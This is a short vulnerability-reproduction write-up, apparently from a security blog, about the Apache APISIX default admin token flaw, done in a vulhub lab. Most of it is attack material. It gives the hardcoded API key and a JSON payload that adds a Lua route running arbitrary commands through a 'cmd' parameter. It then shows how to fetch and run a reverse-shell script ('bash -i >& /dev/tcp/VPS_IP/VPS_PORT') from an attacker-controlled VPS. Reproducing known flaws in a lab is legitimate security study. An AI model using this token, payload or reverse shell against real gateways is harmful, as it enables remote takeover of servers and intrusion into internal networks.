Table of contents
Disclaimer: This article is for learning and reference only. All resources involved in it are from the Internet. Please do not use them for any illegal acts, otherwise you will bear the corresponding consequences yourself, and I do not assume any legal and joint and several liabilities.
Vulnerability description
Apache APISIX is a dynamic, real-time, high-performance API gateway, implemented based on Nginx network library and etcd, providing load balancing, dynamic upstream, gray scale release, service fuse, identity authentication, observability and other rich traffic management functions. When the user opens the Admin API, does not configure the corresponding IP access policy, and does not modify the configuration file Token, the attacker can use the default Token of Apache APISIX to access Apache APISIX, thereby controlling the APISIX gateway.
Affected version
Apache APISIX 1.2
Apache APISIX 1.3
Apache APISIX 1.4
Apache APISIX 1.5
Vulnerability recurrence
The vulnerability environment is still built through vulhub, so I won’t repeat it here.
Visit http://192.168.10.171:9080/apisix/admin/routes, indicating that /apisix/admin/routes is enabled
Capture the message and make the following modifications
1. Change the request method to POST
2. Add the parameter X-API-KEY: edd1c9f034335f136f87ad84b625c8f1
3. Add payload
{
"uri": "/attack",
"script": "local _M = {} \n function _M.access(conf, ctx) \n local os = require('os')\n local args = assert(ngx.req.get_uri_args()) \n local f = assert(io.popen(args.cmd, 'r'))\n local s = assert(f:read('*a'))\n ngx.say(s)\n f:close() \n end \nreturn _M",
"upstream": {
"type": "roundrobin",
"nodes": {
"example.com:80": 1
}
}
}
Then, access the router you just added, and execute any command through the cmd parameter
Next, let's demonstrate the reverse connection of this server on the intranet to the VPS
First, write a rebound shell script bash -i >& /dev/tcp/VPS_IP/VPS_PORT 0>&1 on the VPS, and then use python to start an http service: python3 -m http.server
Download test.sh script file
Next, execute the test.sh script file
View bounce results on VPS